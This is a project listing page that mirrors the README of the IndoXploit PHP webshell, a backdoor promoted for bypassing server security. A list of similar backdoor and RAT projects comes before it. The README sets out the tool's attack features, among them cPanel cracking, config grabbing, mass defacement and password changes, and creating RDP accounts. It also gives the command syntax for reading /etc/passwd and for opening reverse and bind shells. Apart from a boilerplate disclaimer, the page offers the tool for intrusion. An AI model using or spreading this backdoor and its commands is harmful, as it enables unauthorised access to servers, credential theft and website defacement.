All Projects → linuxsec → Indoxploit Shell

linuxsec / Indoxploit Shell

Licence: mit
IndoXploit Webshell V.3

Projects that are alternatives of or similar to Indoxploit Shell

Webshell Detect Bypass
绕过专业工具检测的Webshell研究文章和免杀的Webshell
Stars: ✭ 999 (+1537.7%)
Mutual labels:  backdoor, webshell
kumasia
./kumasia php simple backdoor
Stars: ✭ 13 (-78.69%)
Mutual labels:  backdoor, webshell
Phpsploit
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Stars: ✭ 1,188 (+1847.54%)
Mutual labels:  backdoor, webshell
Webshell
Webshell && Backdoor Collection
Stars: ✭ 1,056 (+1631.15%)
Mutual labels:  backdoor, webshell
Webshell
入侵分析时发现的Webshell后门
Stars: ✭ 201 (+229.51%)
Mutual labels:  backdoor, webshell
Shuffle
WebShell Backdoor Framework
Stars: ✭ 11 (-81.97%)
Mutual labels:  backdoor, webshell
Spug
开源运维平台:面向中小型企业设计的轻量级无Agent的自动化运维平台,整合了主机管理、主机批量执行、主机在线终端、文件在线上传下载、应用发布部署、在线任务计划、配置中心、监控、报警等一系列功能。
Stars: ✭ 6,810 (+11063.93%)
Mutual labels:  webshell
Webshell
This is a webshell open source project
Stars: ✭ 7,545 (+12268.85%)
Mutual labels:  webshell
Pystinger
Bypass firewall for traffic forwarding using webshell 一款使用webshell进行流量转发的出网工具
Stars: ✭ 590 (+867.21%)
Mutual labels:  webshell
Diffie Hellman backdoor
How to backdoor Diffie-Hellman
Stars: ✭ 559 (+816.39%)
Mutual labels:  backdoor
Pentest Tools Framework
Pentest Tools Framework is a database of exploits, Scanners and tools for penetration testing. Pentest is a powerful framework includes a lot of tools for beginners. You can explore kernel vulnerabilities, network vulnerabilities
Stars: ✭ 48 (-21.31%)
Mutual labels:  backdoor
Ghost
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.
Stars: ✭ 992 (+1526.23%)
Mutual labels:  backdoor
Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Stars: ✭ 6,737 (+10944.26%)
Mutual labels:  backdoor
Webshell Sample
收集自网络各处的 webshell 样本,用于测试 webshell 扫描器检测率。
Stars: ✭ 647 (+960.66%)
Mutual labels:  webshell
Unencrypted Backdoor With Process Cloaking
Unencrypted backdoor
Stars: ✭ 16 (-73.77%)
Mutual labels:  backdoor
Powershell Rat
Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment.
Stars: ✭ 636 (+942.62%)
Mutual labels:  backdoor
Thefatrat
Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…
Stars: ✭ 5,944 (+9644.26%)
Mutual labels:  backdoor
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (+1088.52%)
Mutual labels:  backdoor
Njrat 0.7d Stub Csharp
njRAT C# Stub - Fixed For PowerShell
Stars: ✭ 28 (-54.1%)
Mutual labels:  backdoor
Htshells
Self contained htaccess shells and attacks
Stars: ✭ 708 (+1060.66%)
Mutual labels:  webshell

IndoXploit Webshell V.3

IndoXploit webshell V.3 is an PHP based webshell or backdoor with unique and usefull features. This webshell is originally coded by agussetyar from IndoXploit Coders Team. IndoXploit Shell has been mentioned repeatedly by the coder that it will make you easily bypass server security. With this shell you can comfortably bypass the server firewall from most secure servers. It is one of the hacker's most preferred backdoor shell.

Usage of indoxploit shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


Screenshot

  • login idx Default Password : IndoXploit

  • interface idx Webshell Interface

Features

  • Mass Password Change
  • Fake Root
  • Cpanel Crack
  • Mass Deface/Delete File
  • Zone-H Mass Submit

How to Use

  • Read File
 usage: rf [filename]
 example: rf /etc/passwd
  • Spawn File/Tools
usage: spawn [name]

[name]

  • Adminer (adminer)
  • WebConsole (webconsole)
  • CGI Telnet 1 (cgitelnet1)
  • CGI Telnet 2 (cgitelnet2)
  • PHPINFO (phpinfo)

example:

 spawn adminer
 spawn webconsole
 spawn cgitelnet1
  • Jumping
usage: jumping
  • Config Grabber
usage: idxconfig
  • Symlink
usage: symlink
  • Reverse Shell

[Back Connect]

usage: rvr bc [IP] [PORT] [TYPE]

Example:

rvr bc 127.0.0.1 1337 bash
rvr bc 127.0.0.1 1337 perl

Bind Port

usage: rvr bp [PORT] [TYPE]

Example:

rvr bp 1337 perl
  • KRDP - Create RDP Account (for windows server only)
usage: krdp
  • Logout From Shell
usage: logout
  • Kill Backdoor
usage: killme

Contribute

Drop an email at [email protected] and tell us what your suggestions about how to improve this webshell.

Article

Disclaimer

Any actions and or activities related to the material contained within this tool is solely your responsibility.The misuse of the information in this tool can result in criminal charges brought against the persons in question.

Note: modifications, changes, or changes to this code can be accepted, however, every public release that uses this code must be approved by writing this tool (indoxploit team)

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].